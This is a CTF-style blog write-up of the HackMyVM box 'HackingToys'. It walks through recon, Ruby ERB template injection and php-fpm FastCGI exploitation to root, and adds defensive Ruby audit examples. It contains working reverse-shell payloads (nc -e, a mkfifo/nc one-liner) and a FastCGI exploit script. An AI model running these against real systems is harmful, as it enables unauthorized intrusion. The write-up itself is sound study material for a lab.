HackingToys

Notes:

This is the first box I have done that needs the network environment configured in advance.

Network configuration

The first step with any HackMyVM box is network configuration. HackMyVM publishes each machine in two forms, a VMware image and a VirtualBox image, and both types are listed on the site.


VirtualBox host-only configuration


VMware virtual network configuration


Kali settings


eth0 and eth1 settings

vim /etc/network/interfaces

auto eth0
iface eth0 inet dhcp
auto eth1
iface eth1 inet dhcp

Restart networking

service networking restart

With the target VM running, use arp-scan (if the target was already running, reboot it first).

arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:13:58:9c, IPv4: 192.168.56.102
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:17 (Unknown: locally administered)
192.168.56.100 08:00:27:44:3b:b0 PCS Systemtechnik GmbH
192.168.56.101 08:00:27:b0:7d:40 PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.372 seconds (107.93 hosts/sec). 3 responded

HackingToys

Information gathering

Start with an nmap scan

nmap 192.168.56.101
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-24 01:09 CST
Nmap scan report for bogon (192.168.56.101)
Host is up (0.0017s latency).
Not shown: 998 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
3000/tcp open ppp

Nmap done: 1 IP address (1 host up) scanned in 0.41 seconds

Ports 22 and 3000 are open. Port 22 is SSH; port 3000 needs a closer look, so scan it with version detection.

nmap -sV 192.168.56.101 -p3000
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-09-24 01:22 CST
Nmap scan report for bogon (192.168.56.101)
Host is up (0.00073s latency).

PORT STATE SERVICE VERSION
3000/tcp open ssl/ppp?
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port3000-TCP:V=7.94SVN%T=SSL%I=7%D=9/24%Time=66F1A410%P=x86_64-pc-linux
SF:-gnu%r(GenericLines,3EF,"HTTP/1\.0\x20400\x20Bad\x20Request\r\nContent-
SF:Length:\x20930\r\n\r\nPuma\x20caught\x20this\x20error:\x20Invalid\x20HT
SF:TP\x20format,\x20parsing\x20fails\.\x20Are\x20you\x20trying\x20to\x20op
SF:en\x20an\x20SSL\x20connection\x20to\x20a\x20non-SSL\x20Puma\?\x20\(Puma
SF:::HttpParserError\)\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2
SF:/lib/puma/client\.rb:268:in\x20`execute'\n/usr/local/rvm/gems/ruby-3\.1
SF:\.0/gems/puma-6\.4\.2/lib/puma/client\.rb:268:in\x20`try_to_finish'\n/u
SF:sr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/server\.rb:29
SF:8:in\x20`reactor_wakeup'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\
SF:.4\.2/lib/puma/server\.rb:248:in\x20`block\x20in\x20run'\n/usr/local/rv
SF:m/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:119:in\x20`w
SF:akeup!'\n/usr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/re
SF:actor\.rb:76:in\x20`block\x20in\x20select_loop'\n/usr/local/rvm/gems/ru
SF:by-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:76:in\x20`select'\n/u
SF:sr/local/rvm/gems/ruby-3\.1\.0/gems/puma-6\.4\.2/lib/puma/reactor\.rb:7
SF:6:in\x20`select_loop'\n/usr/loc")%r(GetRequest,169E,"HTTP/1\.0\x20403\x
SF:20Forbidden\r\ncontent-type:\x20text/html;\x20charset=UTF-8\r\nContent-
SF:Length:\x205702\r\n\r\n<!DOCTYPE\x20html>\n<html\x20lang=\"en\">\n<head
SF:>\n\x20\x20<meta\x20charset=\"utf-8\"\x20/>\n\x20\x20<meta\x20name=\"vi
SF:ewport\"\x20content=\"width=device-width,\x20initial-scale=1\">\n\x20\x
SF:20<meta\x20name=\"turbo-visit-control\"\x20content=\"reload\">\n\x20\x2
SF:0<title>Action\x20Controller:\x20Exception\x20caught</title>\n\x20\x20<
SF:style>\n\x20\x20\x20\x20body\x20{\n\x20\x20\x20\x20\x20\x20background-c
SF:olor:\x20#FAFAFA;\n\x20\x20\x20\x20\x20\x20color:\x20#333;\n\x20\x20\x2
SF:0\x20\x20\x20color-scheme:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20s
SF:upported-color-schemes:\x20light\x20dark;\n\x20\x20\x20\x20\x20\x20marg
SF:in:\x200px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20body,\x20p,\x20ol,\x2
SF:0ul,\x20td\x20{\n\x20\x20\x20\x20\x20\x20font-family:\x20helvetica,\x20
SF:verdana,\x20arial,\x20sans-serif;\n\x20\x20\x20\x20\x20\x20font-size:\x
SF:20\x20\x2013px;\n\x20\x20\x20\x20\x20\x20line-height:\x2018px;\n\x20\x2
SF:0\x20\x20}\n\n\x20\x20\x20\x20pre\x20{\n\x20\x20\x20\x20\x20\x20font-si
SF:ze:\x2011px;\n\x20\x20\x20\x20\x20\x20white-space:\x20pre-wrap;\n\x20\x
SF:20\x20\x20}\n\n\x20\x20\x20\x20pre\.box\x20{\n\x20\x20\x20\x20\x20\x20b
SF:order:\x201px\x20solid\x20#EEE;\n\x20\x20\x20\x20\x20\x20padding:\x2010
SF:px;\n\x20\x20\x20\x20\x20\x20margin:\x200px;\n\x20\x20\x20\x20\x20\x20w
SF:idth:\x20958px;\n\x20\x20\x20\x20}\n\n\x20\x20\x20\x20header\x20{\n\x20
SF:\x20\x20\x20\x20\x20color:\x20#F0F0F0;\n\x20\x20\x20\x20\x20\x20backgro
SF:und:\x20#C00;\n\x20\x20\x20\x20\x20\x20padding:");

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 66.50 seconds

The service speaks SSL, so try opening it over HTTPS.


The site lists five hacking tools and has a search box.

Vulnerability discovery

Opening the five links only leads to those same five tools, so the search box is the only place a clue is likely to be. Search for something that does not exist and see how the site responds.


The input is reflected back inside a message that reads "Product does not exist", which points clearly at SSTI. Changing the text after message also turns up an XSS, but that does not seem very useful here.


The site is written in Ruby.


Since Ruby code can be run from the template, try template injection; it executes.


Next, check whether system commands run: running "id" and "ls" each returns "true", which seems to mean they succeeded, so try a reverse shell.

<%= system("id") %>
<%= system("ls /") %>
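The pattern behind the search box, and the way it should have been written, as an added example in Ruby. This is constructed code, not the HackingToys application's own: the message text, the function names and the harmless 7 * 7 probe are assumptions. The vulnerable function builds the ERB template source out of the user's query, so any ERB tag in the query is compiled and run on the server; the hardened function keeps the template constant and passes the query in as data, which is why the same probe comes back as escaped text instead of being evaluated.

```ruby
require "erb"

# Added, constructed example; not the HackingToys application's code.
# Vulnerable: the query is concatenated into the template source, so ERB
# tags inside it are compiled and executed on the server.
def render_message_vulnerable(query)
  template = "Product #{query} does not exist"
  ERB.new(template).result(binding)
end

# Hardened: the template source is fixed and the query only reaches it as a
# value through result_with_hash. html_escape also neutralises the reflected
# XSS the writeup mentions.
def render_message_safe(query)
  template = "Product <%= ERB::Util.html_escape(query) %> does not exist"
  ERB.new(template).result_with_hash(query: query)
end

# Detection side: real product names never contain ERB delimiters, so a
# query carrying "<%" or "%>" is worth logging or rejecting at the edge.
def template_probe?(query)
  query.match?(/<%|%>/)
end

# Constructed inputs: an ordinary search and the arithmetic probe that tells
# "reflected as text" apart from "evaluated as a template".
NORMAL_QUERY = "nmap"
PROBE_QUERY  = "<%= 7 * 7 %>"

if $PROGRAM_NAME == __FILE__
  puts render_message_vulnerable(PROBE_QUERY) # Product 49 does not exist
  puts render_message_safe(PROBE_QUERY)       # tags come back as escaped text
end
```

The difference in output is the whole test: "49" in the response means the server evaluated the query, while "&lt;%= 7 * 7 %&gt;" means it was treated as data.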



Reverse shell

<%= system('nc -e /bin/bash 192.168.56.102 4444') %>

Listen on port 4444 on Kali

nc -lvnp 4444
listening on [any] 4444 ...
connect to [192.168.56.102] from (UNKNOWN) [192.168.56.101] 48188
id
uid=1000(lidia) gid=1000(lidia) groups=1000(lidia),100(users),1002(rvm)
whoami
lidia

Upgrade to a pty with Python

python3 -c "import pty;pty.spawn('/bin/bash')"


The passwd file is readable; reading it reveals a second user, dodi.


Exchange SSH public keys between the two machines to get passwordless login.

Privilege escalation

The process list shows php-fpm running as the dodi user.


Check the listening ports


Port 9000 is listening. The target has no socat, so forward port 9000 to the local machine with ssh instead.

ssh -L 9000:127.0.0.1:9000 lidia@192.168.56.101

Someone's notes say php-fpm can be used for RCE directly: https://exploit-notes.hdks.org/exploit/network/fastcgi-pentesting/
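Why this step works, and the configuration that closes it, as an added example: a small Ruby check run over two constructed php-fpm pool files. This is not code from the writeup, from php-fpm or from the notes linked above; the socket path and the www-data account are assumptions, while dodi and 127.0.0.1:9000 come from the box. A pool runs PHP as its user, and anyone who can open the pool's FastCGI socket can supply PHP_VALUE and SCRIPT_FILENAME and run code as that user. With a TCP listener on 127.0.0.1:9000, every local account can do that, which is exactly the lidia to dodi hop here; listen.allowed_clients does not help, because it filters by source IP and every local user arrives from 127.0.0.1. A unix socket with listen.owner, listen.group and a 0660 mode limits the socket to the web server account.

```ruby
# Added, constructed check; not from the writeup, php-fpm or the linked notes.

# Minimal parser for the "key = value" lines of a pool file. ';' starts a
# comment and "[www]" style section headers carry no settings.
def parse_pool(text)
  text.each_line.with_object({}) do |line, cfg|
    line = line.sub(/;.*/, "").strip
    next if line.empty? || line.start_with?("[")
    key, value = line.split("=", 2)
    cfg[key.strip] = value.to_s.strip if key
  end
end

# Report who can reach the pool's FastCGI socket.
def listen_findings(cfg)
  listen = cfg["listen"].to_s
  return ["no listen directive"] if listen.empty?
  # php-fpm treats anything that is not a path as ip:port or a bare port.
  unless listen.start_with?("/")
    return ["TCP listener #{listen}: every local user can connect; " \
            "listen.allowed_clients filters by source IP only, and local users all come from 127.0.0.1"]
  end
  mode_str = cfg.fetch("listen.mode", "0660") # php-fpm's default socket mode
  findings = []
  if (mode_str.to_i(8) & 0o006) != 0
    findings << "listen.mode #{mode_str} lets every local user connect to the socket"
  end
  findings
end

def audit_pool(text)
  listen_findings(parse_pool(text))
end

# Constructed pool files. The first mirrors the box (php-fpm as dodi on
# 127.0.0.1:9000); the second moves it to a unix socket owned by the web
# server account, assumed here to be www-data.
WEAK_POOL = <<~CONF
  [www]
  user = dodi
  group = dodi
  listen = 127.0.0.1:9000
  pm = static
  pm.max_children = 5
CONF

HARDENED_POOL = <<~CONF
  [www]
  user = dodi
  group = dodi
  listen = /run/php/hackingtoys.sock
  listen.owner = www-data
  listen.group = www-data
  listen.mode = 0660
  pm = static
  pm.max_children = 5
CONF

if $PROGRAM_NAME == __FILE__
  puts "weak:     #{audit_pool(WEAK_POOL).inspect}"
  puts "hardened: #{audit_pool(HARDENED_POOL).inspect}"
end
```

The check only looks at the listen settings, because that is the boundary that failed here: moving the pool to a unix socket changes the question from "which IP may connect" to "which local account may open the socket", and the mode bits answer that directly.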

Exploit:

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('rm -f /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <ip> <port> >/tmp/f'); echo '-->';"
FILENAMES="/dev/shm/index.php" # Existing file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

Escalating to dodi

Modify the script and run it

#!/bin/bash

PAYLOAD="<?php echo '<!--'; system('nc -e /bin/bash 192.168.56.102 5555'); echo '-->';"
FILENAMES="/var/www/html/index.php" # Existing file path

HOST=$1
B64=$(echo "$PAYLOAD"|base64)

for FN in $FILENAMES; do
    OUTPUT=$(mktemp)
    env -i \
      PHP_VALUE="allow_url_include=1"$'\n'"allow_url_fopen=1"$'\n'"auto_prepend_file='data://text/plain\;base64,$B64'" \
      SCRIPT_FILENAME=$FN SCRIPT_NAME=$FN REQUEST_METHOD=POST \
      cgi-fcgi -bind -connect $HOST:9000 &> $OUTPUT

    cat $OUTPUT
done

Listen on the port


Once the shell lands, again copy over the SSH public key first for passwordless login.

Escalating to root

Running sudo -l shows a script that can be executed


Run the script

sudo /usr/local/bin/rvm_rails.sh
Usage:
rails COMMAND [options]

You must specify a command:

new Create a new Rails application. "rails new my_app" creates a
new application called MyApp in "./my_app"
plugin new Create a new Rails railtie or engine

All commands can be run with -h (or --help) for more information.

Inside a Rails application directory, some common commands are:

console Start the Rails console
server Start the Rails server
test Run tests except system tests

So it is Rails, the web application framework written in Ruby.

Analyzing the script

#!/bin/bash
export rvm_prefix=/usr/local
export MY_RUBY_HOME=/usr/local/rvm/rubies/ruby-3.1.0
export RUBY_VERSION=ruby-3.1.0
export rvm_version=1.29.12
export rvm_bin_path=/usr/local/rvm/bin
export GEM_PATH=/usr/local/rvm/gems/ruby-3.1.0:/usr/local/rvm/gems/ruby-3.1.0@global
export GEM_HOME=/usr/local/rvm/gems/ruby-3.1.0
export PATH=/usr/local/rvm/gems/ruby-3.1.0/bin:/usr/local/rvm/gems/ruby-3.1.0@global/bin:/usr/local/rvm/rubies/ruby-3.1.0/bin:/usr/local/bin:/usr/bin:/bin:/usr/local/games:/usr/games:/usr/local/rvm/bin
export IRBRC=/usr/local/rvm/rubies/ruby-3.1.0/.irbrc
export rvm_path=/usr/local/rvm
exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"

At the end, the script execs the file /usr/local/rvm/gems/ruby-3.1.0/bin/rails.


The lidia user has write permission on that file, so as lidia write /bin/bash into it; running the script then escalates.


Run the script as dodi to get root.
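A check for the root cause of this escalation, added here as an example (constructed Ruby, not part of the writeup or of rvm): a script allowed through sudo is only as trustworthy as the file it execs, so if that file or its parent directory can be modified by a non-root user, everyone allowed to run the script gets root. The function names are assumptions; the uid and gid values in the sample come from the id output earlier in the writeup (lidia is in group rvm, gid 1002), and the exec line is the one from rvm_rails.sh.

```ruby
# Added, constructed audit helper; not part of the writeup or of rvm.
EXEC_RE = /^\s*exec\s+(\S+)/

# Pull every exec target out of a wrapper script's text.
def exec_targets(script_text)
  script_text.each_line.filter_map { |line| line[EXEC_RE, 1] }
end

# The policy on raw ownership and mode bits, kept separate from the
# filesystem so it can be exercised with known values. A root-owned file
# that is writable by a non-root group (the rvm group here) is the case
# that bit this box.
def unsafe_reasons(uid:, gid:, mode:)
  reasons = []
  reasons << "owned by uid #{uid}, not root" unless uid.zero?
  reasons << "world-writable" if (mode & 0o002) != 0
  reasons << "writable by gid #{gid}, a non-root group" if (mode & 0o020) != 0 && !gid.zero?
  reasons
end

def stat_reasons(path)
  st = File.stat(path)
  unsafe_reasons(uid: st.uid, gid: st.gid, mode: st.mode)
end

# Audit a wrapper script on disk. Returns { target => [reasons] } for every
# exec target that a non-root user could tamper with, or that is missing
# (a missing target may be creatable by a non-root user).
def audit_wrapper(script_path)
  exec_targets(File.read(script_path)).each_with_object({}) do |target, findings|
    unless File.exist?(target)
      findings[target] = ["does not exist"]
      next
    end
    reasons = stat_reasons(target) +
              stat_reasons(File.dirname(target)).map { |r| "parent directory #{r}" }
    findings[target] = reasons unless reasons.empty?
  end
end

# Constructed sample: the exec line from rvm_rails.sh.
SAMPLE_WRAPPER = <<~SH
  #!/bin/bash
  export rvm_path=/usr/local/rvm
  exec /usr/local/rvm/gems/ruby-3.1.0/bin/rails "$@"
SH

if $PROGRAM_NAME == __FILE__ && ARGV.any?
  audit_wrapper(ARGV[0]).each { |target, reasons| puts "#{target}: #{reasons.join('; ')}" }
end
```

Run it against each script that appears in sudo -l output; an empty result means every exec target, and the directory holding it, is root-owned and writable only by root. The same idea applies to a sudo entry that names an interpreter or a script in a user-writable path, which this check would not catch on its own.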



HackingToys
https://www.mrdang.icu/2024/09/24/HackingToys/
Author: Mr.Dang
Published: 24 September 2024